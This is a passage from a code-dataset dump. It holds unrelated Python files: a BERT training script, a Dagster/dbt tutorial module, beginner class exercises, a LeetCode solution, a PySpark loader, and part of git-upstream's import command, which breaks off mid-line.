name='detail'),\n]\n","repo_name":"mentix02/lottery","sub_path":"album/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18183909052","text":"import json\nimport glob\nimport pickle as pkl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io\nfrom sklearn import svm, tree\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.preprocessing import normalize, scale\nfrom scipy.cluster.vq import whiten\nfrom sklearn.manifold import TSNE\n\nfrom transformers import BertTokenizer, BertForSequenceClassification, BertConfig\nfrom transformers.optimization import AdamW, get_linear_schedule_with_warmup\nimport torch\nimport math\nimport time\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom sklearn.model_selection import StratifiedKFold\n\n\ndef get_optimizers(model, learning_rate, adam_epsilon, weight_decay, num_training_steps):\n # Prepare optimizer and schedule (linear warmup and decay)\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": weight_decay},\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0},\n ]\n optimizer = AdamW(optimizer_grouped_parameters, lr=learning_rate, eps=adam_epsilon)\n\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0,\n num_training_steps=num_training_steps)\n return optimizer, scheduler\n\ndef train_and_test():\n # prepare data\n fileNameList = glob.glob('C:/YYQ/PGproject/PreProcessing/processed_features_facenet/*.pkl')\n # print(fileNameList)\n # basic features\n # text-list and tf-idf\n text_list = []\n labels = []\n visual_features = []\n audio_features = []\n for file_name in fileNameList:\n data_point = pkl.load(open(file_name, 'rb'))\n clip_name, label, transcription, smoothed_seq = data_point[0], data_point[1], data_point[2], data_point[3]\n # print(label, transcription)\n # continue\n labels.append(label)\n text_list.append(transcription)\n # average visual features\n # visual_seq = np.stack([w['landmark_feature'] for w in smoothed_seq], axis=0)\n visual_seq = np.stack([w['facenet_feature'].squeeze() for w in smoothed_seq], axis=0)\n # visual_seq = scale(visual_seq)\n # visual_seq = visual_seq - np.mean(visual_seq, axis=0)\n # print(visual_seq.shape)\n # visual_mean = np.mean(visual_seq, axis=0)\n visual_features.append(visual_seq)\n # average audio features\n audio_seq = np.stack([w['audio_grp'] for w in smoothed_seq], axis=0)\n # audio_seq = scale(audio_seq)\n # print(audio_seq.shape)\n # audio_mean = np.mean(audio_seq, axis=0)\n audio_features.append(audio_seq)\n\n # exit()\n print(text_list)\n lens = [len(a.split()) for a in text_list]\n print(min(lens), max(lens))\n exit()\n\n tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n pg = tokenizer.batch_encode_plus(text_list, max_length=128, pad_to_max_length=True)\n '''print(len(pg))\n for k in pg.keys():\n print(k, len(pg[k]), [len(kk) for kk in pg[k]])'''\n\n x = pg['input_ids']\n token_type_ids = pg['token_type_ids']\n attention_mask = pg['attention_mask']\n '''for xx in x:\n print(xx)'''\n\n x, token_type_ids, attention_mask = np.array(x), np.array(token_type_ids), np.array(attention_mask)\n labels = np.array(labels)\n\n skf = StratifiedKFold(n_splits=5)\n cv5_ids = list(skf.split(x, labels))\n\n sp = cv5_ids[0]\n train_l, train_labels = x[sp[0]], labels[sp[0]]\n # train_data, train_labels = sm.fit_sample(train_data, train_labels)\n test_l, test_labels = x[sp[1]], labels[sp[1]]\n print(train_l.shape)\n\n train_token_type_ids, test_token_type_ids, train_attention_mask, test_attention_mask = token_type_ids[sp[0]], \\\n token_type_ids[sp[1]], attention_mask[sp[0]], attention_mask[sp[1]]\n\n # shuffle training data for batch reading\n n_train = len(train_l)\n n_eval = len(test_l)\n perm = np.random.permutation(n_train)\n train_l = train_l[perm]\n train_labels = np.array(train_labels)[perm]\n train_token_type_ids, train_attention_mask = train_token_type_ids[perm], train_attention_mask[perm]\n\n train_l, test_l, train_labels, test_labels, train_token_type_ids, test_token_type_ids = torch.LongTensor(train_l), \\\n torch.LongTensor(test_l), \\\n torch.LongTensor(train_labels), \\\n torch.LongTensor(test_labels), \\\n torch.LongTensor(train_token_type_ids), \\\n torch.LongTensor(test_token_type_ids)\n\n train_attention_mask, test_attention_mask = torch.FloatTensor(train_attention_mask), \\\n torch.FloatTensor(test_attention_mask)\n\n # model = BertForSequenceClassification.from_pretrained('bert-base-uncased', num_labels=3).to('cuda')\n config = BertConfig.from_pretrained('bert-base-uncased', num_labels=3)\n model = BertForSequenceClassification(config).to('cuda')\n # print(model(train_l[:32], token_type_ids=train_token_type_ids[:32], attention_mask=train_attention_mask[:32], labels=train_labels[:32])[1])\n\n eval_every = 5\n batch_size = 32\n test_batch_size = 8\n max_epochs = 500\n t_total = math.ceil(n_train / batch_size) * max_epochs\n lr = 2e-5\n epsilon = 1e-8\n max_grad_norm = 1.0\n weight_decay = 0.0\n\n optimizer, scheduler = get_optimizers(model, learning_rate=lr, adam_epsilon=epsilon, weight_decay=weight_decay,\n num_training_steps=t_total)\n\n # loss_fn = torch.nn.CrossEntropyLoss().cuda()\n model.train()\n model.zero_grad()\n\n for ep in range(max_epochs):\n idx = 0\n avg_loss = 0\n n_batch = 0\n model.train()\n while idx < n_train:\n optimizer.zero_grad()\n batch_l = train_l[idx:(idx + batch_size)].to('cuda')\n batch_ty = train_token_type_ids[idx:(idx + batch_size)].to('cuda')\n batch_am = train_attention_mask[idx:(idx + batch_size)].to('cuda')\n ans = train_labels[idx:(idx + batch_size)].to('cuda')\n idx += batch_size\n preds = model(input_ids=batch_l, token_type_ids=batch_ty, attention_mask=batch_am, labels=ans)\n loss = preds[0]\n # print(preds, ans)\n loss.backward()\n # print(loss.data.cpu().numpy())\n avg_loss += loss.data.cpu().numpy()\n n_batch += 1.\n\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_grad_norm)\n optimizer.step()\n scheduler.step()\n model.zero_grad()\n\n avg_loss = avg_loss / n_batch\n print(\"epoch: %d avg_loss: %f\" % (ep + 1, avg_loss))\n\n del batch_l, batch_ty, batch_am\n torch.cuda.empty_cache()\n # time.sleep(20)\n\n if ep % eval_every == 0:\n idx = 0\n model.eval()\n eval_preds = np.array([])\n while idx < n_eval:\n test_batch_l = test_l[idx:(idx + test_batch_size)].to('cuda')\n test_batch_ty = test_token_type_ids[idx:(idx + test_batch_size)].to('cuda')\n test_batch_am = test_attention_mask[idx:(idx + test_batch_size)].to('cuda')\n test_ans = test_labels[idx:(idx + test_batch_size)].to('cuda')\n # time.sleep(20)\n # exit()\n test_pred = model(input_ids=test_batch_l,\n token_type_ids=test_batch_ty,\n attention_mask=test_batch_am,\n labels=test_ans)\n scores = test_pred[1]\n _, batch_eval_preds = scores.data.cpu().max(1)\n eval_preds = np.concatenate((eval_preds, batch_eval_preds), axis=-1)\n idx += test_batch_size\n # metrics\n precison, recall, fscore, support = precision_recall_fscore_support(test_labels.cpu().numpy(), eval_preds,\n labels=[0, 1, 2], average=None)\n\n '''scores = model(train_data, train_lens)\n _, train_preds = scores.data.cpu().max(1)\n print(\"training set: %f\" % (float(sum(train_preds.numpy() == train_labels.cpu().numpy())) / len(train_preds.numpy())))\n print(eval_preds.numpy())'''\n print(float(sum(eval_preds == test_labels.cpu().numpy())) / len(eval_preds))\n print(precison, recall, fscore, support)\n\n\nif __name__ == \"__main__\":\n train_and_test()\n\n","repo_name":"FlamingHorizon/MORSE","sub_path":"transformer_textual.py","file_name":"transformer_textual.py","file_ext":"py","file_size_in_byte":8993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9880295957","text":"# ruff: noqa: I001\n# start_imports\nimport os\n\nimport duckdb\nimport pandas as pd\nimport plotly.express as px\nfrom dagster import MetadataValue, AssetExecutionContext, asset\nfrom dagster_dbt import DbtCliResource, dbt_assets, get_asset_key_for_model\n\nfrom .constants import dbt_manifest_path, dbt_project_dir\n\n# end_imports\n\nduckdb_database_path = dbt_project_dir.joinpath(\"tutorial.duckdb\")\n\n\n@asset(compute_kind=\"python\")\ndef raw_customers(context: AssetExecutionContext) -> None:\n data = pd.read_csv(\"https://docs.dagster.io/assets/customers.csv\")\n connection = duckdb.connect(os.fspath(duckdb_database_path))\n connection.execute(\"create schema if not exists jaffle_shop\")\n connection.execute(\n \"create or replace table jaffle_shop.raw_customers as select * from data\"\n )\n\n # Log some metadata about the table we just wrote. It will show up in the UI.\n context.add_output_metadata({\"num_rows\": data.shape[0]})\n\n\n@dbt_assets(manifest=dbt_manifest_path)\ndef jaffle_shop_dbt_assets(context: AssetExecutionContext, dbt: DbtCliResource):\n yield from dbt.cli([\"build\"], context=context).stream()\n\n\n# start_downstream_asset\n@asset(\n compute_kind=\"python\",\n deps=get_asset_key_for_model([jaffle_shop_dbt_assets], \"customers\"),\n)\ndef order_count_chart(context: AssetExecutionContext):\n # read the contents of the customers table into a Pandas DataFrame\n connection = duckdb.connect(os.fspath(duckdb_database_path))\n customers = connection.sql(\"select * from customers\").df()\n\n # create a plot of number of orders by customer and write it out to an HTML file\n fig = px.histogram(customers, x=\"number_of_orders\")\n fig.update_layout(bargap=0.2)\n save_chart_path = duckdb_database_path.parent.joinpath(\"order_count_chart.html\")\n fig.write_html(save_chart_path, auto_open=True)\n\n # tell Dagster about the location of the HTML file,\n # so it's easy to access from the Dagster UI\n context.add_output_metadata(\n {\"plot_url\": MetadataValue.url(\"file://\" + os.fspath(save_chart_path))}\n )\n\n\n# end_downstream_asset\n","repo_name":"dagster-io/dagster","sub_path":"examples/docs_snippets/docs_snippets/integrations/dbt/tutorial/downstream_assets/assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"23979497975","text":"## 2. Defining the Dataset Class ##\n\nclass Dataset:\n def __init__(self):\n self.type = 'csv'\n \ndataset = Dataset()\nprint(dataset.type)\n\n## 3. Passing Additional Arguments to the Initializer ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.data = data\n \nnfl_data_file = open('nfl.csv', 'r')\ncsvreader = csv.reader(nfl_data_file)\nnfl_data = list(csvreader)\ndataset = Dataset(nfl_data)\ndataset_data = dataset.data\n\n## 4. Adding Additional Behavior ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.data = data\n def print_data(self, num_rows):\n print(self.data[:num_rows])\n\ndataset = Dataset(nfl_data)\nnfl_dataset = dataset.data\ndataset.print_data(5) \n\n## 5. Enhancing the Initializer ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.data = data\n def extract_header(self):\n self.header = self.data[0]\n self.data = self.data[1:]\n\nnfl_dataset = Dataset(nfl_data)\nnfl_dataset.extract_header()\nnfl_header = nfl_dataset.header\n\n## 6. Grabbing Column Data ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.header = data[0]\n self.data = data[1:]\n \n # Add your method here.\n def column(self, label):\n if label not in self.header:\n return None\n index = 0\n for idx, element in enumerate(self.header):\n if label == element:\n index = idx\n column = []\n for row in self.data:\n column.append(row[index])\n return column\n \n\nnfl_dataset = Dataset(nfl_data)\nyear_column = nfl_dataset.column('year')\nplayer_column = nfl_dataset.column('player')\n\n## 7. Count Unique Method ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.header = data[0]\n self.data = data[1:]\n \n def column(self, label):\n if label not in self.header:\n return None\n \n index = 0\n for idx, element in enumerate(self.header):\n if label == element:\n index = idx\n \n column = []\n for row in self.data:\n column.append(row[index])\n return column\n \n def count_unique(self, label):\n return len(set(self.column(label)))\n\nnfl_dataset = Dataset(nfl_data)\ntotal_years = nfl_dataset.count_unique('year')\n\n## 8. Make Objects Human Readable ##\n\n# Default display code\nclass Dataset:\n def __init__(self, data):\n self.header = data[0]\n self.data = data[1:]\n \n # Add the special method here\n \n def column(self, label):\n if label not in self.header:\n return None\n \n index = 0\n for idx, element in enumerate(self.header):\n if label == element:\n index = idx\n \n column = []\n for row in self.data:\n column.append(row[index])\n return column\n \n \n def count_unique(self, label):\n unique_results = set(self.column(label))\n count = len(unique_results)\n return count\n \n def __str__(self):\n return str(self.data[:10])\n\nnfl_dataset = Dataset(nfl_data)\nprint(nfl_dataset)","repo_name":"atharvalele/dataquest-code","sub_path":"python-programming-intermediate/Classes-259.py","file_name":"Classes-259.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9188777658","text":"from collections import defaultdict\nclass Solution:\n def equalPairs(self, grid: List[List[int]]) -> int: \n count = 0\n CountRow = defaultdict(int)\n for row in grid:\n CountRow[tuple(row)] += 1\n for col in zip(*grid):\n count += CountRow[col]\n return count","repo_name":"Suratan63011017/LeetCode","sub_path":"2352.py","file_name":"2352.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13271759189","text":"from pyspark.sql.types import StructType\n\ndef extract_data(session):\n\n #Define the schema before importing data from Hadoop. Schema contains name of each column and data type.\n dataSchema = StructType().add(\"title\", \"string\").add(\"rank\", \"integer\").add(\"date\", \"string\").add(\"artist\", \"string\").add(\"url\", \"string\").add(\"region\", \"string\").add(\"chart\", \"string\").add(\"trend\", \"string\").add(\"streams\", \"integer\")\n\n # -- Reading Raw Data -- \n\n # -- Reading Raw Data -- \n\n #Read CSV file from HDFS running on localhost using the previously defined schema. `header` indicates that the file contains a header row which should be omitted before reading.\n data = session.read.csv(\"hdfs://localhost:9000/user/input/charts.csv\", schema=dataSchema, header=True)\n\n #Create a temporary local table view of the DataFrame with name as `charts_data`. We can now run SQL queries on this table.\n data.createOrReplaceTempView(\"charts_data\")\n\n # Top200 chart has the most number of entries so we're only interested in that entries with chart=top200.\n # We are only interested in the columns title, rank, date, artist, region, and streams so we will select only those columns.\n result = session.sql(\"SELECT title, rank, date, SUBSTRING_INDEX(artist, ',', 1) AS artist, region, streams FROM charts_data WHERE chart='top200'\")\n \n session.catalog.dropTempView('charts_data') #Dropping the temp table as we no longer need it.\n\n return result\n\nif __name__==\"__main__\":\n extract_data()\n","repo_name":"dhanush-bhargav/dats6102-project","sub_path":"code/extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19679314981","text":"from git_upstream.errors import GitUpstreamError\nfrom git_upstream.log import LogDedentMixin\nfrom git_upstream.lib.utils import GitMixin\nfrom git_upstream.lib.rebaseeditor import RebaseEditor\nfrom git_upstream import subcommand, log\nfrom git_upstream.lib.searchers import UpstreamMergeBaseSearcher\n\nfrom abc import ABCMeta, abstractmethod\nfrom collections import Sequence\nfrom git import GitCommandError\n\nimport inspect\n\n\nclass ImportUpstreamError(GitUpstreamError):\n \"\"\"Exception thrown by L{ImportUpstream}\"\"\"\n pass\n\n\nclass ImportUpstream(LogDedentMixin, GitMixin):\n \"\"\"\n Import code from an upstream project and merge in additional branches\n to create a new branch unto which changes that are not upstream but are\n on the local branch are applied.\n \"\"\"\n\n def __init__(self, branch=None, upstream=None, import_branch=None,\n extra_branches=None, *args, **kwargs):\n if not extra_branches:\n extra_branches = []\n self._branch = branch\n self._upstream = upstream\n self._import_branch = import_branch\n self._extra_branches = extra_branches\n\n # make sure to correctly initialise inherited objects before performing\n # any computation\n super(ImportUpstream, self).__init__(*args, **kwargs)\n\n # test that we can use this git repo\n if not self.is_detached():\n raise ImportUpstreamError(\"In 'detached HEAD' state\")\n\n if self.repo.bare:\n raise ImportUpstreamError(\"Cannot perform imports in bare repos\")\n\n if self.branch == 'HEAD':\n self._branch = str(self.repo.active_branch)\n\n # validate branches exist and log all failures\n branches = [\n self.branch,\n self.upstream\n ]\n branches.extend(self.extra_branches)\n\n invalid_ref = False\n for branch in branches:\n if not any(head for head in self.repo.heads\n if head.name == branch):\n msg = \"Specified ref does not exist: '%s'\"\n self.log.error(msg, branch)\n invalid_ref = True\n\n if invalid_ref:\n raise ImportUpstreamError(\"Invalid ref\")\n\n @property\n def branch(self):\n \"\"\"Branch to search for branch changes to apply when importing.\"\"\"\n return self._branch\n\n @property\n def upstream(self):\n \"\"\"Branch containing the upstream project code base to track.\"\"\"\n return self._upstream\n\n @property\n def import_branch(self):\n \"\"\"\n Pattern to use to generate the name, or user specified branch name\n to use for import.\n \"\"\"\n return self._import_branch\n\n @property\n def extra_branches(self):\n \"\"\"\n Branch containing the additional branches to be merged with the\n upstream when importing.\n \"\"\"\n return self._extra_branches\n\n def _set_branch(self, branch, commit, checkout=False, force=False):\n\n if str(self.repo.active_branch) == branch:\n self.log.info(\n \"\"\"\\\n Resetting branch '%s' to specified commit '%s'\n git reset --hard %s\n \"\"\", branch, commit, commit)\n self.git.reset(commit, hard=True)\n elif checkout:\n if force:\n checkout_opt = '-B'\n else:\n checkout_opt = '-b'\n\n self.log.info(\n \"\"\"\\\n Checking out branch '%s' using specified commit '%s'\n git checkout %s %s %s\n \"\"\", branch, commit, checkout_opt, branch, commit)\n self.git.checkout(checkout_opt, branch, commit)\n else:\n self.log.info(\n \"\"\"\\\n Creating branch '%s' from specified commit '%s'\n git branch --force %s %s\n \"\"\", branch, commit, branch, commit)\n self.git.branch(branch, commit, force=force)\n\n def create_import(self, commit=None, import_branch=None, checkout=False,\n force=False):\n \"\"\"\n Create the import branch from the specified commit.\n\n If the branch already exists abort if force is false\n If current branch, reset the head to the specified commit\n If checkout is true, switch and reset the branch to the commit\n Otherwise just reset the branch to the specified commit\n If the branch doesn't exist, create it and switch to it\n automatically if checkout is true.\n \"\"\"\n\n if not commit:\n commit = self.upstream\n\n try:\n self.git.show_ref(commit, quiet=True, heads=True)\n\n except GitCommandError as e:\n msg = \"Invalid commit '%s' specified to import from\"\n self.log.error(msg, commit)\n raise ImportUpstreamError((msg + \": %s\"), commit, e)\n\n if not import_branch:\n import_branch = self.import_branch\n\n # use describe in order to be certain about unique identifying 'commit'\n # Create a describe string with the following format:\n # [-]*\n #\n # Simply appends the 7 character ref abbreviation for each extra branch\n # prefixed with '-', for each extra branch in the order they are given.\n describe_commit = self.git.describe(commit, tags=True,\n with_exceptions=False)\n if not describe_commit:\n self.log.warning(\"No tag describes the upstream branch\")\n describe_commit = self.git.describe(commit, always=True, tags=True)\n\n self.log.info(\"\"\"\\\n Using '%s' to describe:\n %s\n \"\"\", describe_commit, commit)\n describe_branches = [describe_commit]\n\n describe_branches.extend([self.git.rev_parse(b, short=True)\n for b in self.extra_branches])\n import_describe = \"-\".join(describe_branches)\n self._import_branch = self.import_branch.format(\n describe=import_describe)\n\n self._import_branch = import_branch.format(describe=import_describe)\n base = self._import_branch + \"-base\"\n self.log.debug(\"Creating and switching to import branch base '%s' \"\n \"created from '%s' (%s)\", base, self.upstream, commit)\n\n self.log.info(\n \"\"\"\\\n Checking if import branch '%s' already exists:\n git branch --list %s\n \"\"\", base, base)\n if self.git.show_ref(\"refs/heads/\" + base, verify=True,\n with_exceptions=False) and not force:\n msg = \"Import branch '%s' already exists, set 'force' to replace\"\n self.log.error(msg, self.import_branch)\n raise ImportUpstreamError(msg % self.import_branch)\n\n self._set_branch(base, commit, checkout, force)\n\n if self.extra_branches:\n self.log.info(\n \"\"\"\\\n Merging additional branch(es) '%s' into import branch '%s'\n git checkout %s\n git merge %s\n \"\"\", \", \".join(self.extra_branches), base, base,\n \" \".join(self.extra_branches))\n self.git.checkout(base)\n self.git.merge(*self.extra_branches)\n\n def _linearise(self, branch, sequence, previous_import):\n\n counter = len(sequence) - 1\n ancestors = set()\n\n self._set_branch(branch, previous_import, checkout=True, force=True)\n root = previous_import.hexsha\n while counter > 0:\n # add commit to list of ancestors to check\n ancestors.add(root)\n\n # look for merge commits that are not part of ancestry path\n for idx in xrange(counter - 1, -1, -1):\n commit = sequence[idx]\n # if there is only one parent, no need to check the others\n if len(commit.parents) < 2:\n ancestors.add(commit.hexsha)\n elif any(p.hexsha not in ancestors for p in commit.parents):\n self.log.debug(\"Rebase upto commit SHA1: %s\",\n commit.hexsha)\n idx = idx + 1\n break\n else:\n ancestors.add(commit.hexsha)\n tip = sequence[idx].hexsha\n\n self.log.info(\"Rebasing from %s to %s\", root, tip)\n previous = self.git.rev_parse(branch)\n self.log.info(\"Rebasing onto '%s'\", previous)\n if root == previous and idx == 0:\n # special case, we are already linear\n self.log.info(\"Already in a linear layout\")\n return\n self._set_branch(branch, tip, force=True)\n try:\n self.log.debug(\n \"\"\"\\\n git rebase -p --onto=%s \\\\\n %s %s\n \"\"\", previous, root, branch)\n self.git.rebase(root, branch, onto=previous, p=True)\n except:\n self.git.rebase(abort=True, with_exceptions=False)\n raise\n counter = idx - 1\n # set root commit for next loop\n root = sequence[counter].hexsha\n\n def apply(self, strategy, interactive=False):\n \"\"\"Apply list of commits given onto latest import of upstream\"\"\"\n\n commit_list = list(strategy.filtered_iter())\n if len(commit_list) == 0:\n self.log.notice(\"There are no local changes to be applied!\")\n return False\n\n self.log.debug(\n \"\"\"\\\n Should apply the following list of commits\n %s\n \"\"\", \"\\n \".join([c.hexsha for c in commit_list]))\n\n base = self.import_branch + \"-base\"\n\n self._set_branch(self.import_branch, self.branch, force=True)\n self.log.info(\n \"\"\"\\\n Creating import branch '%s' from specified commit '%s' in prep to\n linearize the local changes before transposing to the new upstream:\n git branch --force %s %s\n \"\"\", self.import_branch, self.branch, self.import_branch,\n self.branch)\n\n self.log.notice(\"Attempting to linearise previous changes\")\n # attempt to silently linearize the current carried changes as a branch\n # based on the previous located import commit. This provides a sane\n # abort result for if the user needs to abort the rebase of this branch\n # onto the new point upstream that was requested to import from.\n try:\n self._linearise(self.import_branch, strategy,\n strategy.searcher.commit)\n except:\n # Could ask user if they want to try and use the non clean route\n # provided they don't mind that 'git rebase --abort' will result\n # in a virtually useless local import branch\n self.log.warning(\n \"\"\"\\\n\n Exception occurred during linearisation of local changes on to\n previous import to simplify behaviour should user need to abort\n the rebase that applies these changes to the latest import\n point. Attempting to tidy up state.\n\n Do not Ctrl+C unless you wish to need to clean up your git\n repository by hand.\n\n \"\"\")\n # reset head back to the tip of the changes to be rebased\n self._set_branch(self.import_branch, self.branch, force=True)\n\n rebase = RebaseEditor(interactive, repo=self.repo)\n if len(commit_list):\n first = commit_list[0]\n\n self.log.info(\n \"\"\"\\\n Rebase changes, dropping merges through editor:\n git rebase --onto %s \\\\\n %s %s\n \"\"\", base, first.parents[0].hexsha, self.import_branch)\n status, out, err = rebase.run(commit_list,\n first.parents[0].hexsha,\n self.import_branch,\n onto=base)\n if status:\n if err and err.startswith(\"Nothing to do\"):\n # cancelled by user\n self.log.notice(\"Cancelled by user\")\n return False\n\n self.log.error(\"Rebase failed, will need user intervention to \"\n \"resolve.\")\n if out:\n self.log.notice(out)\n if err:\n self.log.notice(err)\n\n # once we support resuming/finishing add a message here to tell\n # the user to rerun this tool with the appropriate options to\n # complete\n return False\n\n self.log.notice(\"Successfully applied all locally carried changes\")\n else:\n self.log.warning(\"Warning, nothing to do: locally carried \" +\n \"changes already rebased onto \" + self.upstream)\n return True\n\n def resume(self, args):\n \"\"\"Resume previous partial import\"\"\"\n raise NotImplementedError\n\n def finish(self):\n \"\"\"\n Finish merge according to the selected strategy while performing\n suitable verification checks.\n \"\"\"\n self.log.info(\"No verification checks enabled\")\n self.git.checkout(self.branch)\n current_sha = self.git.rev_parse(\"HEAD\")\n\n try:\n self.log.info(\n \"\"\"\\\n Merging by inverting the 'ours' strategy discard all changes\n and replace existing branch contents with the new import.\n \"\"\")\n self.log.info(\n \"\"\"\\\n Merging import branch to HEAD and ignoring changes:\n git merge -s ours --no-commit %s\n \"\"\", self.import_branch)\n self.git.merge('-s', 'ours', self.import_branch, no_commit=True)\n self.log.info(\n \"\"\"\\\n Replacing tree contents with those from the import branch:\n git read-tree %s\n \"\"\", self.import_branch)\n self.git.read_tree(self.import_branch)\n self.log.info(\n \"\"\"\\\n Committing merge commit:\n git commit --no-edit\n \"\"\")\n self.git.commit(no_edit=True)\n self.log.info(\n \"\"\"\\\n Checking out updated index:\n git checkout -- .\n \"\"\")\n self.git.checkout(\"--\", \".\")\n # finally test that everything worked correctly by comparing if\n # the tree object id's match\n if self.git.rev_parse(\"HEAD^{tree}\") != \\\n self.git.rev_parse(\"%s^{tree}\" % self.import_branch):\n raise ImportUpstreamError(\n \"Resulting tree does not match import\")\n except (GitCommandError, ImportUpstreamError):\n self.log.error(\n \"\"\"\\\n Failed to finish import by merging branch:\n '%s'\n into and replacing the contents of:\n '%s'\n \"\"\", self.import_branch, self.branch)\n self._set_branch(self.branch, current_sha, force=True)\n return False\n except:\n self.log.exception(\"Unknown exception during finish\")\n self._set_branch(self.branch, current_sha, force=True)\n raise\n return True\n\n\nclass ImportStrategiesFactory(object):\n __strategies = None\n\n @classmethod\n def create_strategy(cls, type, *args, **kwargs):\n if type in cls.list_strategies():\n return cls.__strategies[type](*args, **kwargs)\n else:\n raise RuntimeError(\"No class implements the requested strategy: \"\n \"{0}\".format(type))\n\n @classmethod\n def list_strategies(cls):\n cls.__strategies = {\n subclass._strategy: subclass\n for subclass in LocateChangesStrategy.__subclasses__()\n if subclass._strategy}\n return cls.__strategies.keys()\n\n\nfrom git_upstream.lib.searchers import (NoMergeCommitFilter,\n ReverseCommitFilter,\n DiscardDuplicateGerritChangeId,\n SupersededCommitFilter,\n DroppedCommitFilter)\n\n\nclass LocateChangesStrategy(GitMixin, Sequence):\n \"\"\"\n Base class that needs to be extended with the specific strategy on how to\n handle changes locally that are not yet upstream.\n \"\"\"\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def __init__(self, git=None, *args, **kwargs):\n \"\"\"\n Initialize an empty filters list\n \"\"\"\n self.data = None\n self.filters = []\n super(LocateChangesStrategy, self).__init__(*args, **kwargs)\n\n def __getitem__(self, key):\n if not self.data:\n self.data = self._popdata()\n return self.data[key]\n\n def __len__(self):\n if not self.data:\n self.data = self._popdata()\n return len(self.data)\n\n @classmethod\n def get_strategy_name(cls):\n return cls._strategy\n\n def filtered_iter(self):\n # chain the filters as generators so that we don't need to allocate new\n # lists for each step in the filter chain.\n commit_list = self\n for f in self.filters:\n commit_list = f.filter(commit_list)\n\n return commit_list\n\n def filtered_list(self):\n\n return list(self.filtered_iter())\n\n def _popdata(self):\n \"\"\"\n Should return the list of commits from the searcher object\n \"\"\"\n return self.searcher.list()\n\n\nclass LocateChangesWalk(LocateChangesStrategy):\n \"\"\"\n \"\"\"\n\n _strategy = \"drop\"\n\n def __init__(self, branch=\"HEAD\", search_ref=None, *args, **kwargs):\n self.searcher = UpstreamMergeBaseSearcher(branch=branch,\n pattern=search_ref)\n self.search_ref = search_ref\n super(LocateChangesWalk, self).__init__(*args, **kwargs)\n\n def filtered_iter(self):\n # may wish to make class used to remove duplicate objects configurable\n # through git-upstream specific 'git config' settings\n if self.search_ref:\n self.filters.append(\n DiscardDuplicateGerritChangeId(self.search_ref,\n limit=self.searcher.commit))\n self.filters.append(NoMergeCommitFilter())\n self.filters.append(ReverseCommitFilter())\n self.filters.append(DroppedCommitFilter())\n self.filters.append(\n SupersededCommitFilter(self.search_ref,\n limit=self.searcher.commit))\n\n return super(LocateChangesWalk, self).filtered_iter()\n\n\n@subcommand.arg('-d', '--dry-run', dest='dry_run', action='store_true',\n default=False,\n help='Only print out the list of commits that would be '\n 'applied.')\n@subcommand.arg('-i', '--interactive', action='store_true', default=False,\n help='Let the user edit the list of commits before applying.')\n@subcommand.arg('-f', '--force', dest='force', required=False,\n action='store_true', default=False,\n help='Force overwrite of existing import branch if it exists.')\n@subcommand.arg('--merge', dest='merge', required=False, action='store_true',\n default=True,\n help='Merge the resulting import branch into the target branch'\n ' once complete')\n@subcommand.arg('--no-merge', dest='merge', required=False,\n action='store_false',\n help=\"Disable merge of the resulting import branch\")\n@subcommand.arg('-s', '--strategy', metavar='',\n choices=ImportStrategiesFactory.list_strategies(),\n default=LocateChangesWalk.get_strategy_name(),\n help='Use the given strategy to re-apply locally carried '\n 'changes to the import branch. (default: %(default)s)')\n@subcommand.arg('--into', dest='branch', metavar='', default='HEAD',\n help='Branch to take changes from, and replace with imported '\n 'branch.')\n@subcommand.arg('--import-branch', metavar='',\n help='Name of import branch to use',\n default='import/{describe}')\n@subcommand.arg('upstream_branch', metavar='', nargs='?',\n default='upstream/master',\n help='Upstream branch to import. Must be specified if '\n 'you wish to provide additional branches.')\n@subcommand.arg('branches', metavar='', nargs='*',\n help='Branches to additionally merge into the import branch '\n 'using default git merging behaviour')\ndef do_import(args):\n \"\"\"\n Import code from specified upstream branch.\n\n Creates an import branch from the specified upstream branch, and optionally\n merges additional branches given as arguments. Current branch, unless\n overridden by the --into option, is used as the target branch from which a\n list of changes to apply onto the new import is constructed based on the\n the specified strategy.\n\n Once complete it will merge and replace the contents of the target branch\n with those from the import branch, unless --no-merge is specified.\n \"\"\"\n\n logger = log.get_logger('%s.%s' % (__name__,\n inspect.stack()[0][0].f_code.co_name))\n\n import_upstream = ImportUpstream(branch=args.branch,\n upstream=args.upstream_branch,\n import_branch=args.import_branch,\n extra_branches=args.branches)\n\n logger.notice(\"Searching for previous import\")\n strategy = ImportStrategiesFactory.create_strategy(\n args.strategy, branch=args.branch, search_ref=args.upstream_branch)\n\n if len(strategy) == 0:\n raise ImportUpstreamError(\"Cannot find previous import\")\n\n # if last commit in the strategy was a merge, then the additional branches\n # that were merged in previously can be extracted based on the commits\n # merged.\n prev_import_merge = strategy[-1]\n if 